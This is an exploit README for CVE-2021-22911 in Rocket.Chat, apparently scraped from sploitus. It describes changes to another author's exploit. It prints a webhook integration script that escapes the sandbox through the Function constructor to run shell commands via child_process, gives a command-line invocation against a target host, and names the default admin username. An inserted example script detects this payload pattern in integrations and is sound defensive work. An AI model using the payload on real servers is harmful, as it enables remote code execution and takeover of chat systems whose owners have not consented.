## https://sploitus.com/exploit?id=20192387-7625-5BDB-89FD-50906A88FDBD
# CVE-2021-22911-EXP

## Info

Some small changes to the [code](https://github.com/CsEnox/CVE-2021-22911) by CsEnox:

1. Replace the `oathtool` library with the `pyotp` library.
2. Modify the format of the JavaScript script used to construct the webhook.

```javascript
class Script {
  process_incoming_request({ request }) {
    const require = console.log.constructor('return process.mainModule.require')();
    const { exec } = require('child_process');
    exec('your command');
  }
}
```
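To review a Rocket.Chat instance for integration scripts of the kind shown above, the following added example (not part of this repository or of CsEnox's code) flags scripts that reach the `Function` constructor, `process.mainModule`, or `child_process`. The indicator names, function names and sample integration objects are constructed for illustration, and how the scripts are exported from the server is assumed to be handled elsewhere.

```javascript
// Added example: heuristic audit of webhook integration scripts.
// Indicator ids and the sample documents below are constructed, not from the original page.
const INDICATORS = [
  // Function constructor reached through any object, dot or bracket notation,
  // and called with a string literal: x.constructor('...') / x['constructor']("...")
  { id: 'function-constructor',
    re: /(?:\.\s*constructor|\[\s*['"`]constructor['"`]\s*\])\s*\(\s*['"`]/ },
  // Handle on the host process used to obtain the real require()
  { id: 'process-mainModule',
    re: /process\s*(?:\.\s*mainModule|\[\s*['"`]mainModule['"`]\s*\])/ },
  // Module that provides command execution
  { id: 'child_process', re: /['"`]child_process['"`]/ },
];

// Return every indicator hit in one script, with its 1-based line number.
function auditScript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((line, i) => {
    for (const { id, re } of INDICATORS) {
      if (re.test(line)) findings.push({ id, line: i + 1 });
    }
  });
  return findings;
}

// Keep only the integrations whose script produced at least one finding.
function auditIntegrations(integrations) {
  return integrations
    .map(({ name, script }) => ({ name, findings: auditScript(script || '') }))
    .filter((result) => result.findings.length > 0);
}

// Constructed sample input: one ordinary script and one matching the pattern above.
const SAMPLE_INTEGRATIONS = [
  { name: 'ci-notify', script: [
    'class Script {',
    '  process_incoming_request({ request }) {',
    '    return { content: { text: request.content.text } };',
    '  }',
    '}'].join('\n') },
  { name: 'suspicious-hook', script: [
    'class Script {',
    '  process_incoming_request({ request }) {',
    "    const require = console.log.constructor('return process.mainModule.require')();",
    "    const { exec } = require('child_process');",
    '  }',
    '}'].join('\n') },
];

console.log(JSON.stringify(auditIntegrations(SAMPLE_INTEGRATIONS), null, 2));
```

The match is line-based and textual, so a hit is a prompt for manual review of the integration and its creator, not proof of compromise.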

## Notice

1. You can check whether the webhook executed successfully using the `wget` command, provided that it is installed in the Docker container.
2. The default administrator username in the code is `admin`.

## Usage

```cmd
python exploit.py -u "user@rocket.local" -a "admin@rocket.local" -t "http://rocket.local"
```